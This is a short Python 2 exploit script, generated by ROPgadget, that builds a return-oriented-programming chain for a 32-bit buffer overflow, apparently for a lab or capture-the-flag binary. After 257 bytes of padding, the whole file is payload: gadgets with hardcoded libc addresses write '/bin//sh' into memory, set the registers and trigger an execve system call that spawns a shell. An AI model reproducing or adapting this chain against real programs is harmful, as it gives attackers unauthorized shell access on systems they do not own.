#!/usr/bin/env python2
# execve generated by ROPgadget

from struct import pack

# Padding goes here
p = 'A' * 257

p += pack('<I', 0xf7e18aa6) # pop edx ; ret
p += pack('<I', 0xf7fc7040) # @ .data
p += pack('<I', 0xf7e3af97) # pop eax ; ret
p += '/bin'
p += pack('<I', 0xf7e8234b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0xf7e18aa6) # pop edx ; ret
p += pack('<I', 0xf7fc7044) # @ .data + 4
p += pack('<I', 0xf7e3af97) # pop eax ; ret
p += '//sh'
p += pack('<I', 0xf7e8234b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0xf7e18aa6) # pop edx ; ret
p += pack('<I', 0xf7fc7048) # @ .data + 8
p += pack('<I', 0xf7e435fc) # xor eax, eax ; ret
p += pack('<I', 0xf7e8234b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0xf7e2f395) # pop ebx ; ret
p += pack('<I', 0xf7fc7040) # @ .data
p += pack('<I', 0xf7ecb047) # pop ecx ; ret
p += pack('<I', 0xf7fc7048) # @ .data + 8
p += pack('<I', 0xf7e18aa6) # pop edx ; ret
p += pack('<I', 0xf7fc7048) # @ .data + 8
p += pack('<I', 0xf7e435fc) # xor eax, eax ; ret
p += pack('<I', 0xf7e1eeec) # inc eax ; ret
p += pack('<I', 0xf7e1eeec) # inc eax ; ret
p += pack('<I', 0xf7e1eeec) # inc eax ; ret
p += pack('<I', 0xf7e1eeec) # inc eax ; ret
p += pack('<I', 0xf7e1eeec) # inc eax ; ret
p += pack('<I', 0xf7e1eeec) # inc eax ; ret
p += pack('<I', 0xf7e1eeec) # inc eax ; ret
p += pack('<I', 0xf7e1eeec) # inc eax ; ret
p += pack('<I', 0xf7e1eeec) # inc eax ; ret
p += pack('<I', 0xf7e1eeec) # inc eax ; ret
p += pack('<I', 0xf7e1eeec) # inc eax ; ret
p += pack('<I', 0xf7e19c87) # int 0x80

print(p)
